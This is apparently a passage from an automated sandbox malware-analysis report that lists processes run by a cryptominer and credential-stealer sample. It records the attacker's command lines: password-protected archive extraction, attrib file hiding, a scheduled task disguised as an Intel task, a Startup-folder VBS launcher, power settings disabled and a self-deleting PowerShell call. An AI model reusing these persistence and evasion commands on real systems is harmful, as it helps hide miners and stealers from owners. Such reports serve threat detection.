                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                              Start time:19:01:23
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                              Start time:19:01:26
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                              Imagebase:0x7ff693ab0000
                                                                                                                                                                                              File size:496'640 bytes
                                                                                                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                              Start time:19:01:28
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exe"
                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                              File size:4'438'776 bytes
                                                                                                                                                                                              MD5 hash:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                              • Detection: 83%, ReversingLabs
                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                              Start time:19:01:29
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                              Imagebase:0x253e5e90000
                                                                                                                                                                                              File size:65'168 bytes
                                                                                                                                                                                              MD5 hash:A4EB36BAE72C5CB7392F2B85609D4A7E
                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                              Start time:19:01:29
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                              Imagebase:0x7ff6b1070000
                                                                                                                                                                                              File size:96'256 bytes
                                                                                                                                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                              Start time:19:01:29
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                              Imagebase:0x7ff6b1070000
                                                                                                                                                                                              File size:96'256 bytes
                                                                                                                                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                              Start time:19:01:29
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                              Start time:19:01:29
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                              Imagebase:0x7ff6b1070000
                                                                                                                                                                                              File size:96'256 bytes
                                                                                                                                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                              Start time:19:01:29
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                              Imagebase:0x7ff6b1070000
                                                                                                                                                                                              File size:96'256 bytes
                                                                                                                                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                              Start time:19:01:29
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                              Start time:19:01:29
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                              Start time:19:01:29
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                              Start time:19:01:30
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:explorer.exe
                                                                                                                                                                                              Imagebase:0x7ff72b770000
                                                                                                                                                                                              File size:5'141'208 bytes
                                                                                                                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000017.00000003.3848997557.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000017.00000003.3848708673.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                              Start time:19:01:33
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                                                                                                                                                                                              Imagebase:0x7ff74d0d0000
                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                              Start time:19:01:33
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                              Start time:19:01:33
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\mode.com
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:mode 65,10
                                                                                                                                                                                              Imagebase:0x7ff7f39f0000
                                                                                                                                                                                              File size:33'280 bytes
                                                                                                                                                                                              MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:27
                                                                                                                                                                                              Start time:19:01:33
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                                                                                                                                                                                              Imagebase:0x940000
                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                              Start time:19:01:34
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:7z.exe e extracted/file_7.zip -oextracted
                                                                                                                                                                                              Imagebase:0x940000
                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                              Start time:19:01:34
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:7z.exe e extracted/file_6.zip -oextracted
                                                                                                                                                                                              Imagebase:0x940000
                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                              Start time:19:01:35
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:7z.exe e extracted/file_5.zip -oextracted
                                                                                                                                                                                              Imagebase:0x940000
                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                              Start time:19:01:35
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe"
                                                                                                                                                                                              Imagebase:0xd30000
                                                                                                                                                                                              File size:727'552 bytes
                                                                                                                                                                                              MD5 hash:28E568616A7B792CAC1726DEB77D9039
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                              • Detection: 71%, ReversingLabs
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                              Start time:19:01:35
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                              Start time:19:01:35
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:7z.exe e extracted/file_4.zip -oextracted
                                                                                                                                                                                              Imagebase:0x940000
                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                              Start time:19:01:35
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:7z.exe e extracted/file_3.zip -oextracted
                                                                                                                                                                                              Imagebase:0x940000
                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                              Start time:19:01:37
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:7z.exe e extracted/file_2.zip -oextracted
                                                                                                                                                                                              Imagebase:0x940000
                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                              Start time:19:01:38
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe"
                                                                                                                                                                                              Imagebase:0xd30000
                                                                                                                                                                                              File size:727'552 bytes
                                                                                                                                                                                              MD5 hash:28E568616A7B792CAC1726DEB77D9039
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.2786193933.0000000000BAE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.2879866062.0000000000B9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.2966933877.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.2910972656.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.2967091046.0000000000B9B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.2910429974.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.2973122139.0000000000B9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.2973242098.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.2786126000.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.2850001201.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:37
                                                                                                                                                                                              Start time:19:01:39
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:7z.exe e extracted/file_1.zip -oextracted
                                                                                                                                                                                              Imagebase:0x940000
                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:38
                                                                                                                                                                                              Start time:19:01:39
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs"
                                                                                                                                                                                              Imagebase:0x7ff6272b0000
                                                                                                                                                                                              File size:170'496 bytes
                                                                                                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:39
                                                                                                                                                                                              Start time:19:01:40
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\IsStopped.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\IsStopped.exe"
                                                                                                                                                                                              Imagebase:0x23b75c10000
                                                                                                                                                                                              File size:89'640 bytes
                                                                                                                                                                                              MD5 hash:3C104350CC2661C345673E91ED672C4C
                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000027.00000002.2949152235.0000023B00073000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000027.00000002.2949152235.0000023B000D8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                              • Detection: 5%, ReversingLabs
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:40
                                                                                                                                                                                              Start time:19:01:44
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:attrib +H "in.exe"
                                                                                                                                                                                              Imagebase:0x7ff760a20000
                                                                                                                                                                                              File size:23'040 bytes
                                                                                                                                                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:41
                                                                                                                                                                                              Start time:19:01:45
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\in.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"in.exe"
                                                                                                                                                                                              Imagebase:0x7ff674730000
                                                                                                                                                                                              File size:1'827'328 bytes
                                                                                                                                                                                              MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:42
                                                                                                                                                                                              Start time:19:01:45
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                              Imagebase:0x7ff760a20000
                                                                                                                                                                                              File size:23'040 bytes
                                                                                                                                                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:43
                                                                                                                                                                                              Start time:19:01:46
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                              Imagebase:0x7ff760a20000
                                                                                                                                                                                              File size:23'040 bytes
                                                                                                                                                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:44
                                                                                                                                                                                              Start time:19:01:46
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                                                                                                                                                                                              Imagebase:0x7ff67b910000
                                                                                                                                                                                              File size:235'008 bytes
                                                                                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:45
                                                                                                                                                                                              Start time:19:01:46
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:powershell ping 127.0.0.1; del in.exe
                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                              File size:452'608 bytes
